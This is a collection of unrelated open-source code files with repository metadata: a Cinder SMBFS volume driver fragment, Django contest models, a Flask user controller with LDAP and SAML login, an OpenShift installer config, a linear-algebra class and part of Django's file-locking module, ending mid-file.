raise exception.ExtendVolumeError(
reason='Resizing image file failed.')
def _check_extend_volume_support(self, volume, size_gb):
volume_path = self.local_path(volume)
active_file = self.get_active_image_from_info(volume)
active_file_path = os.path.join(self._local_volume_dir(volume),
active_file)
if active_file_path != volume_path:
msg = _('Extend volume is only supported for this '
'driver when no snapshots exist.')
raise exception.InvalidVolume(msg)
extend_by = int(size_gb) - volume['size']
if not self._is_share_eligible(volume['provider_location'],
extend_by):
raise exception.ExtendVolumeError(reason='Insufficient space to '
'extend volume %s to %sG.'
% (volume['id'], size_gb))
@utils.synchronized('smbfs', external=False)
def copy_volume_to_image(self, context, volume, image_service, image_meta):
self._copy_volume_to_image(context, volume, image_service, image_meta)
@utils.synchronized('smbfs', external=False)
def create_volume_from_snapshot(self, volume, snapshot):
self._create_volume_from_snapshot(volume, snapshot)
def _copy_volume_from_snapshot(self, snapshot, volume, volume_size):
"""Copy data from snapshot to destination volume.
This is done with a qemu-img convert to raw/qcow2 from the snapshot
qcow2.
"""
LOG.debug("Snapshot: %(snap)s, volume: %(vol)s, "
"volume_size: %(size)s" %
{'snap': snapshot['id'],
'vol': volume['id'],
'size': volume_size})
info_path = self._local_path_volume_info(snapshot['volume'])
snap_info = self._read_info_file(info_path)
vol_dir = self._local_volume_dir(snapshot['volume'])
out_format = self.get_volume_format(volume, qemu_format=True)
forward_file = snap_info[snapshot['id']]
forward_path = os.path.join(vol_dir, forward_file)
# Find the file which backs this file, which represents the point
# when this snapshot was created.
img_info = self._qemu_img_info(forward_path,
snapshot['volume']['name'])
path_to_snap_img = os.path.join(vol_dir, img_info.backing_file)
LOG.debug("Will copy from snapshot at %s" % path_to_snap_img)
image_utils.convert_image(path_to_snap_img,
self.local_path(volume),
out_format)
self._extend_volume(volume, volume_size)
self._set_rw_permissions_for_all(self.local_path(volume))
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
volume_format = self.get_volume_format(volume, qemu_format=True)
image_meta = image_service.show(context, image_id)
qemu_version = self.get_qemu_version()
if (qemu_version < [1, 7] and (
volume_format == self._DISK_FORMAT_VHDX and
image_meta['disk_format'] != volume_format)):
err_msg = _("Unsupported volume format: vhdx. qemu-img 1.7 or "
"higher is required in order to properly support this "
"format.")
raise exception.InvalidVolume(err_msg)
image_utils.fetch_to_volume_format(
context, image_service, image_id,
self.local_path(volume), volume_format,
self.configuration.volume_dd_blocksize)
self._do_extend_volume(self.local_path(volume),
volume['size'],
volume['name'])
data = image_utils.qemu_img_info(self.local_path(volume))
virt_size = data.virtual_size / units.Gi
if virt_size != volume['size']:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=(_("Expected volume size was %d") % volume['size'])
+ (_(" but size is now %d.") % virt_size))
@utils.synchronized('smbfs', external=False)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
self._create_cloned_volume(volume, src_vref)
def _ensure_share_mounted(self, smbfs_share):
mnt_flags = []
if self.shares.get(smbfs_share) is not None:
mnt_flags = self.shares[smbfs_share]
# The domain name must be removed from the
# user name when using Samba.
mnt_flags = self.parse_credentials(mnt_flags).split()
self._remotefsclient.mount(smbfs_share, mnt_flags)
def parse_options(self, option_str):
opts_dict = {}
opts_list = []
if option_str:
for i in option_str.split():
if i == '-o':
continue
for j in i.split(','):
tmp_opt = j.split('=')
if len(tmp_opt) > 1:
opts_dict[tmp_opt[0]] = tmp_opt[1]
else:
opts_list.append(tmp_opt[0])
return opts_list, opts_dict
def parse_credentials(self, mnt_flags):
options_list, options_dict = self.parse_options(mnt_flags)
username = (options_dict.pop('user', None) or
options_dict.pop('username', None))
if username:
# Remove the Domain from the user name
options_dict['username'] = username.split('\\')[-1]
else:
options_dict['username'] = 'guest'
named_options = ','.join("%s=%s" % (key, val) for (key, val)
in options_dict.iteritems())
options_list = ','.join(options_list)
flags = '-o ' + ','.join([named_options, options_list])
return flags.strip(',')
def _get_volume_format_spec(self, volume):
extra_specs = []
metadata_specs = volume.get('volume_metadata') or []
extra_specs += metadata_specs
vol_type = volume.get('volume_type')
if vol_type:
volume_type_specs = vol_type.get('extra_specs') or []
extra_specs += volume_type_specs
for spec in extra_specs:
if 'volume_format' in spec.key:
return spec.value
return None
def _is_file_size_equal(self, path, size):
"""Checks if file size at path is equal to size."""
data = image_utils.qemu_img_info(path)
virt_size = data.virtual_size / units.Gi
return virt_size == size
|
{
"content_hash": "ce46a3caa2b7c468715bd08cb968d5f3",
"timestamp": "",
"source": "github",
"line_count": 582,
"max_line_length": 79,
"avg_line_length": 41.197594501718214,
"alnum_prop": 0.5815156191350044,
"repo_name": "jumpstarter-io/cinder",
"id": "d824e8127eed1ce503b07772b7d6f69595509ee0",
"size": "24620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cinder/volume/drivers/smbfs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.contrib.auth.models import User
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from django.core.exceptions import PermissionDenied
# Create your models here.
@python_2_unicode_compatible
class Problem(models.Model):
problem = models.ForeignKey('bank.problem', verbose_name='problem', on_delete=models.CASCADE)
max_score = models.FloatField(default=0)
class Meta:
verbose_name = 'Contest Problem'
ordering = ['problem_id']
def __str__(self):
return "{} : {}".format(self.problem.problem_id, self.problem.title)
class Submission(models.Model):
id = models.AutoField(primary_key=True)
problem = models.ForeignKey('bank.problem', on_delete=models.CASCADE)
score = models.DecimalField(default=0, max_digits=5, decimal_places=2)
time = models.DateTimeField(
auto_now_add=True, verbose_name='Submission Time')
user = models.ForeignKey(User, verbose_name='submitted-by', on_delete=models.CASCADE)
ip = models.GenericIPAddressField(
verbose_name='submitted-by (IP)', blank=True, null=True)
local_file = models.CharField(
max_length=150, null=True, verbose_name='Original File')
testcase_codes = models.CharField(
default="[-1]", max_length=100, verbose_name="Testcase Status Code")
def __str__(self):
return "{} - {} - {}".format(
self.user.username, self.problem.title, self.time)
def testcase_result_verbose(self):
def code_to_string(code):
# code = int(code.strip())
if(code == 0):
return "Pass"
elif(code == 1):
return "SandboxFailure"
elif(code == 2):
return "RuntimeError"
elif(code == 3):
return "MemLimExceeded"
elif(code == 4):
return "TimeLimExceeded"
elif(code == 5):
return "SandboxChildProcessExceeded"
elif(code == 6):
return "CompilationErr"
elif(code == 7):
return "IncorrectAnswer"
else:
return "default"
tests = list(
map(int, self.testcase_codes.replace(" ", "")[1:-1].split(',')))
print(tests)
return list(map(code_to_string, tests))
class Meta:
# Ordering submissions in descending order as per time
ordering = ["-time"]
class Config(models.Model):
start = models.DateTimeField(verbose_name='Start Time')
end = models.DateTimeField(verbose_name='End Time')
# Don't allow more than one config per contest
@receiver(pre_save, sender=Config)
def check_config_count(sender, **kwargs):
if sender.objects.count() >= 1:
ErrorMessage = """
More than one config per contest is not allowed.
To add another first delete the previous one.
"""
raise PermissionDenied(ErrorMessage)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
logged_in = models.BooleanField(default=False)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
|
{
"content_hash": "9a06eb027452332afb921712ee887df4",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 97,
"avg_line_length": 33.45192307692308,
"alnum_prop": 0.6335153779821788,
"repo_name": "CRUx-BPHC/crux-judge",
"id": "b17d1f93f2ed9b875a879b94b7fed7307ef4c1b6",
"size": "3479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/server/contest/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "317"
},
{
"name": "HTML",
"bytes": "2034"
},
{
"name": "Python",
"bytes": "24648"
}
],
"symlink_target": ""
}
|
"""
filename: controllers.py
description: Controller for Users.
created by: Omar De La Hoz (oed7416@rit.edu)
created on: 09/07/17
"""
from flask_socketio import emit
from app.decorators import ensure_dict, get_user
from app import socketio, db
from app.users.models import Users, Roles
from app.users.users_response import Response
from app import saml_manager
from flask_login import login_user, current_user
from flask import redirect, jsonify
import ldap
@socketio.on('get_all_users')
def get_all_users():
users = Users.query.filter_by().all()
users_ser = [{"username": user.id, "name": user.first_name + " " + user.last_name} for user in users]
emit('get_all_users', users_ser)
return;
# setup acs response handler
@saml_manager.login_from_acs
def login_from_acs(acs):
if acs.get('errors'):
return jsonify({'errors': acs.get('errors')})
elif not acs.get('logged_in'):
return jsonify({"error": "login failed"})
else:
attributes = list(acs.get("attributes"))
username = attributes[0][1][0]
firstname = attributes[1][1][0]
lastname = attributes[2][1][0]
email = attributes[3][1][0]
user = Users.query.filter_by(id = username).first()
if user is None:
user = Users(id = username)
user.first_name = firstname
user.last_name = lastname
user.email = email
db.session.add(user)
db.session.commit()
login_user(user)
return redirect('/')
@socketio.on('verify_auth')
@ensure_dict
@get_user
def verify(user, user_data):
if not user:
emit('verify_auth', Response.AuthError)
return;
emit('verify_auth', {
'admin': user.is_admin,
'username': user.id
})
@socketio.on('auth')
@ensure_dict
def login_ldap(credentials):
ldap_server = "ldaps://ldap.rit.edu"
if credentials.get("username","") == "" or credentials.get("password","") == "":
emit('auth', {'error': "Authentication error."})
return;
user_dn = "uid=" + credentials.get("username","") + ",ou=People,dc=rit,dc=edu"
search_filter = "uid=" + credentials.get("username","")
connect = ldap.initialize(ldap_server)
try:
connect.bind_s(user_dn, credentials.get("password",""))
result = connect.search_s(user_dn,ldap.SCOPE_SUBTREE,search_filter)
connect.unbind_s()
values = result[0][1]
username = values["uid"][0].decode('utf-8')
firstname = values["givenName"][0].decode('utf-8')
lastname = values["sn"][0].decode('utf-8')
email = values["mail"][0].decode('utf-8')
# Check if a user exists.
if Users.query.filter_by(id = username).first() is not None:
user = Users.query.filter_by(id = username).first()
token = user.generate_auth()
admin = user.is_admin
emit('auth', {
'token': token.decode('ascii'),
'admin': admin,
'username': username
})
else:
user = Users(id = username)
user.first_name = firstname
user.last_name = lastname
user.email = email
db.session.add(user)
db.session.commit()
token = user.generate_auth()
emit('auth', {'token': token.decode('ascii')})
except ldap.LDAPError:
connect.unbind_s()
emit('auth', Response.AuthError)
return;
##
## @brief Changes a users role to ManagerUser,
## AdminUser or NormalUser.
##
## @param user The user performing the edit.
## @param user_data JSON object containing:
##
## - username: username of the user with
## edited roles.
## - role: AdminUser, ManagerUser or NormalUser.
##
## @emit Success if role was set, PermError if user is not
## an AdminUser, UserNotFound if user is not found,
## RoleNotFound if role doesn't exist and DBError if
## something went wrong in DB-side.
##
@socketio.on('edit_roles')
@ensure_dict
@get_user
def edit_roles(user, user_data):
if not user.is_admin:
emit('auth', Response.PermError)
return;
edit_user = Users.query.filter_by(id = user_data["username"]).first()
if not edit_user:
emit('edit_roles', Response.UserNotFound)
return;
try:
role = Roles[user_data["role"]]
except:
emit('edit_roles', Response.RoleNotFound)
return;
if role == Roles.AdminUser:
edit_user.is_admin = True
elif role == Roles.ManagerUser:
edit_user.is_admin = True
else:
edit_user.is_admin = False
try:
db.session.commit()
emit('edit_roles', {"success": "Role set to " + role.value + "."})
except Exception as e:
db.session.rollback()
emit('edit_roles', Response.DBError)
return;
|
{
"content_hash": "0f234d2b05d5160473ddcfad1465e2a0",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 105,
"avg_line_length": 28.316384180790962,
"alnum_prop": 0.580806065442937,
"repo_name": "ritstudentgovernment/chargeflask",
"id": "75c5c6a1e4c7ff364c127a4a4c45b312ec04df70",
"size": "5012",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/users/controllers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1632"
},
{
"name": "Dockerfile",
"bytes": "381"
},
{
"name": "HTML",
"bytes": "21682"
},
{
"name": "Python",
"bytes": "221454"
},
{
"name": "Shell",
"bytes": "132"
}
],
"symlink_target": ""
}
|
import copy
class SerializableObject(object):
def __init__(self):
pass
def update(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
def as_dict(self):
# use deepcopy so that changing this dictionary later won't affect the SerializableObject
d = copy.deepcopy(self.__dict__)
for k in list(d.keys()):
if d[k] is None:
del d[k]
# recursive serialization
for k, v in d.items():
if isinstance(v, SerializableObject):
d[k] = v.as_dict()
if isinstance(v, list):
for i, e in enumerate(v):
if isinstance(e, SerializableObject):
d[k][i] = e.as_dict()
if isinstance(v, dict):
for l, w in v.items():
if isinstance(w, SerializableObject):
d[k][l] = w.as_dict()
return d
|
{
"content_hash": "13a873d4862fc2537a0f7e407c82ef05",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 97,
"avg_line_length": 32.13333333333333,
"alnum_prop": 0.48858921161825725,
"repo_name": "4dn-dcic/tibanna",
"id": "4f9af45f4a8419f5d8144fc8955e3ca8505bb98a",
"size": "964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tibanna/base.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Common Workflow Language",
"bytes": "1542"
},
{
"name": "Dockerfile",
"bytes": "3222"
},
{
"name": "HTML",
"bytes": "320852"
},
{
"name": "Makefile",
"bytes": "953"
},
{
"name": "Python",
"bytes": "576806"
},
{
"name": "Shell",
"bytes": "50474"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('markets', '0057_auto_20170228_1530'),
]
operations = [
migrations.AlterModelOptions(
name='market',
options={'permissions': (('can_publish', 'Can publish Market'), ('can_unpublish', 'Can unpublish Market'))},
),
]
|
{
"content_hash": "10f0a0b7aad1709195ded5e616a5c382",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 120,
"avg_line_length": 24.352941176470587,
"alnum_prop": 0.6086956521739131,
"repo_name": "uktrade/navigator",
"id": "e840914258fc123b16de99cb719fead346028959",
"size": "487",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "app/markets/migrations/0058_auto_20170505_1140.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "143"
},
{
"name": "HTML",
"bytes": "55604"
},
{
"name": "JavaScript",
"bytes": "53405"
},
{
"name": "Makefile",
"bytes": "4355"
},
{
"name": "Procfile",
"bytes": "181"
},
{
"name": "Python",
"bytes": "243097"
},
{
"name": "SCSS",
"bytes": "125647"
},
{
"name": "Shell",
"bytes": "5758"
}
],
"symlink_target": ""
}
|
from decimal import Decimal, getcontext
from vector import Vector
import random
getcontext().prec = 30
class Line(object):
NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'
def __init__(self, normal_vector=None, constant_term=None):
self.dimension = 2
if not normal_vector:
all_zeros = ['0']*self.dimension
normal_vector = Vector(all_zeros)
self.normal_vector = normal_vector
if not constant_term:
constant_term = Decimal('0')
self.constant_term = Decimal(constant_term)
self.set_basepoint()
def set_basepoint(self):
try:
n = self.normal_vector
c = self.constant_term
basepoint_coords = ['0']*self.dimension
initial_index = Line.first_nonzero_index(n)
'''
initial_coefficient = n[initial_index]
basepoint_coords[initial_index] = c/initial_coefficient
self.basepoint = Vector(basepoint_coords)
'''
except Exception as e:
if str(e) == Line.NO_NONZERO_ELTS_FOUND_MSG:
self.basepoint = None
else:
raise e
def __str__(self):
num_decimal_places = 3
def write_coefficient(coefficient, is_initial_term=False):
coefficient = round(coefficient, num_decimal_places)
if coefficient % 1 == 0:
coefficient = int(coefficient)
output = ''
if coefficient < 0:
output += '-'
if coefficient > 0 and not is_initial_term:
output += '+'
if not is_initial_term:
output += ' '
if abs(coefficient) != 1:
output += '{}'.format(abs(coefficient))
return output
n = self.normal_vector
try:
initial_index = Line.first_nonzero_index(n)
terms = [write_coefficient(n[i], is_initial_term=(i==initial_index)) + 'x_{}'.format(i+1)
for i in range(self.dimension) if round(n[i], num_decimal_places) != 0]
output = ' '.join(terms)
except Exception as e:
if str(e) == self.NO_NONZERO_ELTS_FOUND_MSG:
output = '0'
else:
raise e
constant = round(self.constant_term, num_decimal_places)
if constant % 1 == 0:
constant = int(constant)
output += ' = {}'.format(constant)
return output
@staticmethod
def first_nonzero_index(iterable):
for k, item in enumerate(iterable):
if not MyDecimal(item).is_near_zero():
return k
raise Exception(Line.NO_NONZERO_ELTS_FOUND_MSG)
'''
Two lines are parallel if their normal vectors are parallel.
'''
def is_parallel(self, line):
return Vector(self.normal_vector).is_parallel(Vector(line.normal_vector))
'''
To check if two lines are equal, take a point on each line and calculate
a direction vector. If that vector is orthogonal to the normal vector for
each of the two lines, then the vector lies on the line and the two lines
are equal.
'''
def equals(self, line):
x = random.randint(0,100)
#dir_vec = [self.normal_vector[1], -1*self.normal_vector[0]]
k = float(self.constant_term)
A = self.normal_vector[0]
B = self.normal_vector[1]
y = (k-A*x)/B
pt1 = Vector([x,y])
x = random.randint(0,100)
#dir_vec = [line.normal_vector[1], -1*line.normal_vector[0]]
k = float(line.constant_term)
A = line.normal_vector[0]
B = line.normal_vector[1]
y = (k-A*x)/B
pt2 = Vector([x,y])
vec = pt2-pt1
return (vec.is_orthogonal(Vector(self.normal_vector)) \
and vec.is_orthogonal(Vector(line.normal_vector)))
'''
If they are not parallel and not equal, they intersect. Find the point of intersection
using the formulas derived in the lecture
'''
def intersection(self, line):
p = self.is_parallel(line)
e = self.equals(line)
if not p and not e:
#calculate x and y using the derived formula in the lecture
A = self.normal_vector[0]
B = self.normal_vector[1]
C = line.normal_vector[0]
D = line.normal_vector[1]
k1 = float(self.constant_term)
k2 = float(line.constant_term)
x = (D*k1-B*k2)/(A*D-B*C)
y = (-1*C*k1 + A*k2)/(A*D-B*C)
return Vector([x,y])
else:
if p and e:
return 'Inf'
return None
class MyDecimal(Decimal):
def is_near_zero(self, eps=1e-10):
return abs(self) < eps
# Ax+By=k
# normal_vector = [B,-A]
# constant_term = k
line1 = Line([1.,1.],constant_term=1)
line2 = Line([-3.,-3.], constant_term=-3)
print str(line1.equals(line2))
print line1.intersection(line2)
#Quiz
# 4.046x + 2.836y = 1.21
# 10.115x + 7.09y = 3.025
line1 = Line([4.046, 2.836], 1.21)
line2 = Line([10.115, 7.09], 3.025)
intx = line1.intersection(line2)
if type(intx) is str and intx=='Inf':
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'equal'])
elif type(intx) is Vector:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', str(intx)])
else:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'NO_INTERSECTION'])
print ''
# 7.204x + 3.182y = 8.68
# 8.172x + 4.114y = 9.883
line1 = Line([7.204, 3.182], 8.68)
line2 = Line([8.172, 4.114], 9.883)
intx = line1.intersection(line2)
if type(intx) is str and intx=='Inf':
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'equal'])
elif type(intx) is Vector:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', str(intx)])
else:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'NO_INTERSECTION'])
print ''
# 1.182x + 5.562y = 6.744
# 1.773x + 8.343y = 9.525
line1 = Line([1.182, 5.562], 6.744)
line2 = Line([1.773, 8.343], 9.525)
intx = line1.intersection(line2)
if type(intx) is str and intx=='Inf':
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'equal'])
elif type(intx) is Vector:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', str(intx)])
else:
print ''.join(['line1:',str(line1), ' line2:', str(line2), '::', 'NO_INTERSECTION'])
|
{
"content_hash": "e1ece0efcd09028c50479e151f220521",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 101,
"avg_line_length": 30.957142857142856,
"alnum_prop": 0.5546838947854176,
"repo_name": "jortizcs/machine-learning",
"id": "47f3e1cfb6d3ddb73fb1aaafc30590f8641d2717",
"size": "6501",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "courses/udacity/linearAlgebra/line.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "3461"
},
{
"name": "Jupyter Notebook",
"bytes": "24642"
},
{
"name": "Python",
"bytes": "69458"
},
{
"name": "Shell",
"bytes": "3244"
}
],
"symlink_target": ""
}
|
import os
import yaml
from pkg_resources import resource_filename
PERSIST_SETTINGS = [
'ansible_ssh_user',
'ansible_config',
'ansible_log_path',
'master_routingconfig_subdomain',
'variant',
'variant_version',
'version',
]
DEFAULT_REQUIRED_FACTS = ['ip', 'public_ip', 'hostname', 'public_hostname']
PRECONFIGURED_REQUIRED_FACTS = ['hostname', 'public_hostname']
class OOConfigFileError(Exception):
"""The provided config file path can't be read/written
"""
pass
class OOConfigInvalidHostError(Exception):
""" Host in config is missing both ip and hostname. """
pass
class Host(object):
""" A system we will or have installed OpenShift on. """
def __init__(self, **kwargs):
self.ip = kwargs.get('ip', None)
self.hostname = kwargs.get('hostname', None)
self.public_ip = kwargs.get('public_ip', None)
self.public_hostname = kwargs.get('public_hostname', None)
self.connect_to = kwargs.get('connect_to', None)
self.preconfigured = kwargs.get('preconfigured', None)
self.new_host = kwargs.get('new_host', None)
# Should this host run as an OpenShift master:
self.master = kwargs.get('master', False)
# Should this host run as an OpenShift node:
self.node = kwargs.get('node', False)
# Should this host run as an HAProxy:
self.master_lb = kwargs.get('master_lb', False)
# Should this host run as an HAProxy:
self.storage = kwargs.get('storage', False)
self.containerized = kwargs.get('containerized', False)
if self.connect_to is None:
raise OOConfigInvalidHostError("You must specify either an ip " \
"or hostname as 'connect_to'")
if self.master is False and self.node is False and \
self.master_lb is False and self.storage is False:
raise OOConfigInvalidHostError(
"You must specify each host as either a master or a node.")
def __str__(self):
return self.connect_to
def __repr__(self):
return self.connect_to
def to_dict(self):
""" Used when exporting to yaml. """
d = {}
for prop in ['ip', 'hostname', 'public_ip', 'public_hostname',
'master', 'node', 'master_lb', 'storage', 'containerized',
'connect_to', 'preconfigured', 'new_host']:
# If the property is defined (not None or False), export it:
if getattr(self, prop):
d[prop] = getattr(self, prop)
return d
def is_etcd_member(self, all_hosts):
""" Will this host be a member of a standalone etcd cluster. """
if not self.master:
return False
masters = [host for host in all_hosts if host.master]
if len(masters) > 1:
return True
return False
def is_dedicated_node(self):
""" Will this host be a dedicated node. (not a master) """
return self.node and not self.master
def is_schedulable_node(self, all_hosts):
""" Will this host be a node marked as schedulable. """
if not self.node:
return False
if not self.master:
return True
masters = [host for host in all_hosts if host.master]
nodes = [host for host in all_hosts if host.node]
if len(masters) == len(nodes):
return True
return False
class OOConfig(object):
default_dir = os.path.normpath(
os.environ.get('XDG_CONFIG_HOME',
os.environ['HOME'] + '/.config/') + '/openshift/')
default_file = '/installer.cfg.yml'
def __init__(self, config_path):
if config_path:
self.config_path = os.path.normpath(config_path)
else:
self.config_path = os.path.normpath(self.default_dir +
self.default_file)
self.settings = {}
self._read_config()
self._set_defaults()
def _read_config(self):
self.hosts = []
try:
if os.path.exists(self.config_path):
cfgfile = open(self.config_path, 'r')
self.settings = yaml.safe_load(cfgfile.read())
cfgfile.close()
# Use the presence of a Description as an indicator this is
# a legacy config file:
if 'Description' in self.settings:
self._upgrade_legacy_config()
# Parse the hosts into DTO objects:
if 'hosts' in self.settings:
for host in self.settings['hosts']:
self.hosts.append(Host(**host))
# Watchout for the variant_version coming in as a float:
if 'variant_version' in self.settings:
self.settings['variant_version'] = \
str(self.settings['variant_version'])
except IOError, ferr:
raise OOConfigFileError('Cannot open config file "{}": {}'.format(ferr.filename,
ferr.strerror))
except yaml.scanner.ScannerError:
raise OOConfigFileError(
'Config file "{}" is not a valid YAML document'.format(self.config_path))
def _upgrade_legacy_config(self):
new_hosts = []
remove_settings = ['validated_facts', 'Description', 'Name',
'Subscription', 'Vendor', 'Version', 'masters', 'nodes']
if 'validated_facts' in self.settings:
for key, value in self.settings['validated_facts'].iteritems():
value['connect_to'] = key
if 'masters' in self.settings and key in self.settings['masters']:
value['master'] = True
if 'nodes' in self.settings and key in self.settings['nodes']:
value['node'] = True
new_hosts.append(value)
self.settings['hosts'] = new_hosts
for s in remove_settings:
if s in self.settings:
del self.settings[s]
# A legacy config implies openshift-enterprise 3.0:
self.settings['variant'] = 'openshift-enterprise'
self.settings['variant_version'] = '3.0'
def _set_defaults(self):
if 'ansible_inventory_directory' not in self.settings:
self.settings['ansible_inventory_directory'] = \
self._default_ansible_inv_dir()
if not os.path.exists(self.settings['ansible_inventory_directory']):
os.makedirs(self.settings['ansible_inventory_directory'])
if 'ansible_plugins_directory' not in self.settings:
self.settings['ansible_plugins_directory'] = \
resource_filename(__name__, 'ansible_plugins')
if 'version' not in self.settings:
self.settings['version'] = 'v1'
if 'ansible_callback_facts_yaml' not in self.settings:
self.settings['ansible_callback_facts_yaml'] = '%s/callback_facts.yaml' % \
self.settings['ansible_inventory_directory']
if 'ansible_ssh_user' not in self.settings:
self.settings['ansible_ssh_user'] = ''
self.settings['ansible_inventory_path'] = \
'{}/hosts'.format(self.settings['ansible_inventory_directory'])
# clean up any empty sets
for setting in self.settings.keys():
if not self.settings[setting]:
self.settings.pop(setting)
def _default_ansible_inv_dir(self):
return os.path.normpath(
os.path.dirname(self.config_path) + "/.ansible")
def calc_missing_facts(self):
"""
Determine which host facts are not defined in the config.
Returns a hash of host to a list of the missing facts.
"""
result = {}
for host in self.hosts:
missing_facts = []
if host.preconfigured:
required_facts = PRECONFIGURED_REQUIRED_FACTS
else:
required_facts = DEFAULT_REQUIRED_FACTS
for required_fact in required_facts:
if not getattr(host, required_fact):
missing_facts.append(required_fact)
if len(missing_facts) > 0:
result[host.connect_to] = missing_facts
return result
def save_to_disk(self):
out_file = open(self.config_path, 'w')
out_file.write(self.yaml())
out_file.close()
def persist_settings(self):
p_settings = {}
for setting in PERSIST_SETTINGS:
if setting in self.settings and self.settings[setting]:
p_settings[setting] = self.settings[setting]
p_settings['hosts'] = []
for host in self.hosts:
p_settings['hosts'].append(host.to_dict())
if self.settings['ansible_inventory_directory'] != \
self._default_ansible_inv_dir():
p_settings['ansible_inventory_directory'] = \
self.settings['ansible_inventory_directory']
return p_settings
def yaml(self):
return yaml.safe_dump(self.persist_settings(), default_flow_style=False)
def __str__(self):
return self.yaml()
def get_host(self, name):
for host in self.hosts:
if host.connect_to == name:
return host
return None
|
{
"content_hash": "31c6ecd1958b8d0fe70c8dc7605c6fcf",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 93,
"avg_line_length": 36.24904214559387,
"alnum_prop": 0.5681217630271641,
"repo_name": "BlueShells/openshift-ansible",
"id": "c9498542f7e292d4c9ac8df8dcb36c4d09faa394",
"size": "9711",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "utils/src/ooinstall/oo_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "287707"
},
{
"name": "Ruby",
"bytes": "3270"
},
{
"name": "Shell",
"bytes": "10372"
},
{
"name": "VimL",
"bytes": "459"
}
],
"symlink_target": ""
}
|
"""
Portable file locking utilities.
Based partially on an example by Jonathan Feignberg in the Python
Cookbook [1] (licensed under the Python Software License) and a ctypes port by
Anatoly Techtonik for Roundup [2] (license [3]).
[1] http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/65203
[2] http://sourceforge.net/p/roundup/code/ci/default/tree/roundup/backends/portalocker.py
[3] http://sourceforge.net/p/roundup/code/ci/default/tree/COPYING.txt
Example Usage::
>>> from django.core.files import locks
>>> with open('./file', 'wb') as f:
... locks.lock(f, locks.LOCK_EX)
... f.write('Django')
"""
import os
__all__ = ('LOCK_EX', 'LOCK_SH', 'LOCK_NB', 'lock', 'unlock')
def _fd(f):
"""Get a filedescriptor from something which could be a file or an fd."""
return f.fileno() if hasattr(f, 'fileno') else f
if os.name == 'nt':
import msvcrt
from ctypes import (sizeof, c_ulong, c_void_p, c_int64,
Structure, Union, POINTER, windll, byref)
from ctypes.wintypes import BOOL, DWORD, HANDLE
LOCK_SH = 0 # the default
LOCK_NB = 0x1 # LOCKFILE_FAIL_IMMEDIATELY
LOCK_EX = 0x2 # LOCKFILE_EXCLUSIVE_LOCK
# --- Adapted from the pyserial project ---
# detect size of ULONG_PTR
if sizeof(c_ulong) != sizeof(c_void_p):
ULONG_PTR = c_int64
else:
ULONG_PTR = c_ulong
PVOID = c_void_p
# --- Union inside Structure by stackoverflow:3480240 ---
class _OFFSET(Structure):
_fields_ = [
('Offset', DWORD),
('OffsetHigh', DWORD)]
class _OFFSET_UNION(Union):
_anonymous_ = ['_offset']
_fields_ = [
('_offset', _OFFSET),
('Pointer', PVOID)]
class OVERLAPPED(Structure):
_anonymous_ = ['_offset_union']
_fields_ = [
('Internal', ULONG_PTR),
('InternalHigh', ULONG_PTR),
('_offset_union', _OFFSET_UNION),
('hEvent', HANDLE)]
LPOVERLAPPED = POINTER(OVERLAPPED)
# --- Define function prototypes for extra safety ---
LockFileEx = windll.kernel32.LockFileEx
LockFileEx.restype = BOOL
LockFileEx.argtypes = [HANDLE, DWORD, DWORD, DWORD, DWORD, LPOVERLAPPED]
UnlockFileEx = windll.kernel32.UnlockFileEx
UnlockFileEx.restype = BOOL
UnlockFileEx.argtypes = [HANDLE, DWORD, DWORD, DWORD, LPOVERLAPPED]
def lock(f, flags):
hfile = msvcrt.get_osfhandle(_fd(f))
overlapped = OVERLAPPED()
ret = LockFileEx(hfile, flags, 0, 0, 0xFFFF0000, byref(overlapped))
return bool(ret)
def unlock(f):
hfile = msvcrt.get_osfhandle(_fd(f))
overlapped = OVERLAPPED()
ret = UnlockFileEx(hfile, 0, 0, 0xFFFF0000, byref(overlapped))
return bool(ret)
else:
try:
